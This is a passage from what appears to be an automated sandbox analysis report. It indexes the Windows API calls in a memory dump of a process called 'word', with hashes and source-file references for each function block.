                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                    • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                    • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CopyVariant$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2286883814-0
                                                                    • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                    • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                    • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                    • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                    • #21.WSOCK32 ref: 004740E0
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$socket
                                                                    • String ID:
                                                                    • API String ID: 1881357543-0
                                                                    • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                    • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                    • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                    • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                    • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                    • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                    • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                    • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D10A
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                    • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D16A
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                    • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                    • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                    • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                    APIs
                                                                      • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                    • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                    • __itow.LIBCMT ref: 00461461
                                                                    • __itow.LIBCMT ref: 004614AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2875217250-0
                                                                    • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                    • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                    • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                    • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00472806
                                                                      • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                      • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32(00000000), ref: 00443F18
                                                                      • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                    • GetCaretPos.USER32(?), ref: 0047281A
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                    • GetForegroundWindow.USER32 ref: 0047285C
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                    • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                    • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                    • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                    APIs
                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772A9
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772C0
                                                                    • SetLayeredWindowAttributes.USER32 ref: 004772D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                    • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                    • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                    • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 00448CB8
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                    • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                    • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                    • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                    APIs
                                                                    • select.WSOCK32 ref: 0045890A
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                    • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastacceptselect
                                                                    • String ID:
                                                                    • API String ID: 385091864-0
                                                                    • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                    • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                    • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                    • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                    • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                    • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                    • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                    APIs
                                                                    • CreateWindowExW.USER32 ref: 0043367E
                                                                    • GetStockObject.GDI32(00000011), ref: 00433695
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                    • String ID:
                                                                    • API String ID: 1358664141-0
                                                                    • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                    • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                    • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                    • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                    • MessageBoxW.USER32 ref: 004441F6
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                    • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                    • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                    • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00434037
                                                                    • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                    • ScreenToClient.USER32(?,?), ref: 00434085
                                                                    • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                    • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                    • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                    • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                    • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                    • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 00436A45
                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                    • __wsplitpath.LIBCMT ref: 00436A6C
                                                                    • __wcsicoll.LIBCMT ref: 00436A93
                                                                    • __wcsicoll.LIBCMT ref: 00436AB0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                    • String ID:
                                                                    • API String ID: 1187119602-0
                                                                    • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                    • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                    • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                    • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1597257046-0
                                                                    • Opcode ID: 3f9e39f95ee7fc7e73bf6fbdf9abf117ce30c9b28e80196bac90679c933779ca
                                                                    • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                    • Opcode Fuzzy Hash: 3f9e39f95ee7fc7e73bf6fbdf9abf117ce30c9b28e80196bac90679c933779ca
                                                                    • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyObject$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 3349847261-0
                                                                    • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                    • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                    • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                    • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                    Memory Dump Source
